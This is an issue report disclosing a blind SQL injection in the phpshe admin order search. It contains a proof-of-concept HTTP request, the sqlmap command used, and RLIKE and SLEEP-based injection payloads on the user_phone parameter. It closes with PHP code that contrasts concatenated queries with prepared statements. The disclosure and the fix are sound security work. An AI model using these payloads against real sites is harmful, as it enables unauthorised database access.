koyshe / phpshe

I found a blind SQL injection in the background

To do
Created on 2018-12-26 14:38

1. admin index.php (screenshot: index)

2. vulnerability point (screenshot: point)

3. code (screenshot: code)

4. capture the packet (screenshot: cap)

5. sql injection test (screenshot: test)

poc:

GET /phpshe/admin.php?mod=order&state=&id=1&user_tname=1&user_phone=1&date1=2018-12-26&date2= HTTP/1.1
Host: 192.3.221.177
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.3.221.177/phpshe/admin.php?mod=order
Cookie: deviceid=1545098043964; PHPSESSID=d7860vsq3q03c2pvmvc798tt64
Connection: close

sqlmap command:
python sqlmap.py -r 1.txt --level=3 --risk=2 --dbms=mysql --batch -p "user_phone"

injection type:

---
Parameter: user_phone (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: mod=order&state=&id=1&user_tname=1&user_phone=1' RLIKE (SELECT (CASE WHEN (4784=4784) THEN 1 ELSE 0x28 END))-- EfBd&date1=2018-12-26&date2=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: mod=order&state=&id=1&user_tname=1&user_phone=1' AND (SELECT * FROM (SELECT(SLEEP(5)))hxbT)-- YEPD&date1=2018-12-26&date2=
---
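The sqlmap output above shows the shape of the flaw: the admin order search takes user_phone from the query string and the single quote in the payload ends up inside the SQL text. The following is an added example, not phpshe's own code, that puts a search filter built by string concatenation next to the same filter built with bound parameters. The table name `orders`, its columns, the request array and the SQLite in-memory database (standing in for MySQL so the script runs offline with the pdo_sqlite extension) are all assumptions made for the illustration.

```php
<?php
// Added example (not phpshe's code): two ways to build the admin order
// search from request parameters. Table/column names are assumptions.

// VULNERABLE pattern: request values are concatenated into the WHERE
// clause. A quote inside user_phone closes the string literal and the
// remainder of the value becomes SQL, which is what sqlmap exploited.
function buildOrderQueryVulnerable(array $get): string
{
    $where = "1=1";
    if ($get['user_phone'] !== '') {
        $where .= " AND order_phone LIKE '%" . $get['user_phone'] . "%'";
    }
    if ($get['user_tname'] !== '') {
        $where .= " AND order_tname LIKE '%" . $get['user_tname'] . "%'";
    }
    if ($get['date1'] !== '') {
        $where .= " AND order_date >= '" . $get['date1'] . "'";
    }
    if ($get['date2'] !== '') {
        $where .= " AND order_date <= '" . $get['date2'] . "'";
    }
    return "SELECT order_id, order_phone FROM orders WHERE $where";
}

// HARDENED pattern: the SQL text is fixed and every user-controlled value
// travels separately as a bound parameter, so quotes, RLIKE or SLEEP
// fragments in the value are compared as literal text, never executed.
function buildOrderQuerySafe(array $get): array
{
    $where  = ["1=1"];
    $params = [];
    if ($get['user_phone'] !== '') {
        $where[]  = "order_phone LIKE ?";
        $params[] = '%' . $get['user_phone'] . '%';
    }
    if ($get['user_tname'] !== '') {
        $where[]  = "order_tname LIKE ?";
        $params[] = '%' . $get['user_tname'] . '%';
    }
    if ($get['date1'] !== '') {
        $where[]  = "order_date >= ?";
        $params[] = $get['date1'];
    }
    if ($get['date2'] !== '') {
        $where[]  = "order_date <= ?";
        $params[] = $get['date2'];
    }
    $sql = "SELECT order_id, order_phone FROM orders WHERE " . implode(' AND ', $where);
    return [$sql, $params];
}

// Constructed sample data (hypothetical phone numbers and names).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE orders (order_id INTEGER, order_phone TEXT, order_tname TEXT, order_date TEXT)");
$pdo->exec("INSERT INTO orders VALUES (1, '13800000001', 'alice', '2018-12-26')");
$pdo->exec("INSERT INTO orders VALUES (2, '13800000002', 'bob',   '2018-12-27')");

// Two constructed requests mirroring the PoC parameters: a normal search
// and one carrying the quote-prefixed fragment from the sqlmap output.
$requests = [
    'legitimate' => ['user_phone' => '13800000001', 'user_tname' => '', 'date1' => '2018-12-26', 'date2' => ''],
    'payload'    => ['user_phone' => "1' RLIKE (SELECT 1)-- x", 'user_tname' => '', 'date1' => '2018-12-26', 'date2' => ''],
];

foreach ($requests as $label => $get) {
    echo "[$label] concatenated SQL: " . buildOrderQueryVulnerable($get) . "\n";

    [$sql, $params] = buildOrderQuerySafe($get);
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
    echo "[$label] prepared statement matched " . count($rows) . " row(s)\n";
}
// The legitimate search returns 1 row with both builders; the payload
// request is matched against the literal string by the prepared statement
// and returns 0 rows, while the concatenated version shows the quote
// breaking out of the string literal in the printed SQL.
```

Running the script prints the concatenated SQL for each request so the broken quoting is visible, then executes only the prepared form. On the real MySQL backend the same bound-parameter approach applies unchanged; the other filter fields on this page (user_tname, date1, date2) reach the query the same way and should be bound the same way.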

Comments (0)

si1ence created this task

Repository: https://gitee.com/koyshe/phpshe.git